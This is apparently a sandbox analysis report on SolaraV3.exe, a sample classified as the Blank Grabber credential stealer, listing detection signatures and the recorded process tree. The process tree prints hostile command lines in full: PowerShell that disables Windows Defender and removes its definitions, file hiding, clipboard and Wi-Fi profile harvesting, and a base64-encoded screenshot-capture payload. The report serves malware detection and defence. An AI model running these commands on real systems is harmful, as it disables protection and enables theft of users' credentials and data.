Edit tour

Windows Analysis Report
SolaraV3.exe

Overview

General Information

Sample name:	SolaraV3.exe
Analysis ID:	1525849
MD5:	7dd77a8611b56c1ed090293e3ab40f08
SHA1:	1cb4be6453ab5dbeebd8339e0ec4264d6efa611c
SHA256:	5d887dd72893e3bd40b291a1dc3ea2bc94f6d0daf4de318bd1005b57fbe114ca
Tags:	exeuser-aachum
Infos:

Detection

Blank Grabber

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Sigma detected: Capture Wi-Fi password

Suricata IDS alerts for network traffic

Yara detected Blank Grabber

Yara detected Telegram RAT

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Bypasses PowerShell execution policy

Check if machine is in data center or colocation facility

Encrypted powershell cmdline option found

Found many strings related to Crypto-Wallets (likely being stolen)

Found pyInstaller with non standard icon

Loading BitLocker PowerShell Module

Modifies Windows Defender protection settings

Modifies existing user documents (likely ransomware behavior)

Modifies the hosts file

Potentially malicious time measurement code found

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Removes signatures from Windows Defender

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Powershell Defender Disable Scan Feature

Sigma detected: Rar Usage with Password and Compression Level

Sigma detected: Suspicious Encoded PowerShell Command Line

Sigma detected: Suspicious PowerShell Encoded Command Patterns

Sigma detected: Suspicious Startup Folder Persistence

Suspicious powershell command line found

Tries to harvest and steal WLAN passwords

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Uses attrib.exe to hide files

Uses cmd line tools excessively to alter registry or file data

Uses netsh to modify the Windows network and firewall settings

Uses the Telegram API (likely for C&C communication)

Writes or reads registry keys via WMI

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Compiles C# or VB.Net code

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to shutdown / reboot the system

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates a window with clipboard capturing capabilities

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evaded block containing many API calls

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries disk information (often used to detect virtual machines)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for the Microsoft Outlook file path

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI

Sigma detected: Powershell Defender Exclusion

Sigma detected: SCR File Write Event

Sigma detected: Startup Folder File Write

Sigma detected: Suspicious Execution of Powershell with Base64

Sigma detected: Suspicious Screensaver Binary File Creation

Sigma detected: Use Short Name Path in Command Line

Steals Internet Explorer cookies

Stores files to the Windows start menu directory

Too many similar processes found

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

SolaraV3.exe (PID: 2884 cmdline: "C:\Users\user\Desktop\SolaraV3.exe" MD5: 7DD77A8611B56C1ED090293E3AB40F08)

SolaraV3.exe (PID: 4892 cmdline: "C:\Users\user\Desktop\SolaraV3.exe" MD5: 7DD77A8611B56C1ED090293E3AB40F08)

cmd.exe (PID: 1652 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV3.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 1312 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV3.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 1660 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6044 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)

MpCmdRun.exe (PID: 5248 cmdline: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All MD5: B3676839B2EE96983F9ED735CD044159)

cmd.exe (PID: 2564 cmdline: C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('?????? ?????? ???? ????????. ?????? ??? ?????????? ????? ?????? ? ?????? ?????!', 0, 'Error!', 32+16);close()"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

mshta.exe (PID: 6484 cmdline: mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('?????? ?????? ???? ????????. ?????? ??? ?????????? ????? ?????? ? ?????? ?????!', 0, 'Error!', 32+16);close()" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)

cmd.exe (PID: 4800 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 4212 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 2692 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 6636 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 5700 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 4196 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2 MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 5924 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 6672 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2 MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 2584 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 2076 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 1396 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 3724 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 3040 cmdline: C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\Desktop\SolaraV3.exe"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

attrib.exe (PID: 1832 cmdline: attrib +h +s "C:\Users\user\Desktop\SolaraV3.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)

cmd.exe (PID: 2940 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7052 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr' MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 1832 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7448 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 3040 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7400 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 7308 cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 7484 cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 7532 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7640 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7584 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7824 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 7680 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 7808 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 7888 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

netsh.exe (PID: 7244 cmdline: netsh wlan show profile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)

cmd.exe (PID: 7916 cmdline: C:\Windows\system32\cmd.exe /c "systeminfo" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

systeminfo.exe (PID: 8128 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)

cmd.exe (PID: 7924 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5736 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA= MD5: 04029E121A0CFA5991749937DD22A1D9)

csc.exe (PID: 7312 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

cvtres.exe (PID: 7932 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESF203.tmp" "c:\Users\user\AppData\Local\Temp\se3yji4z\CSC9CC35FFA2F54059AD6E143F6E3C2E84.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

cmd.exe (PID: 7936 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

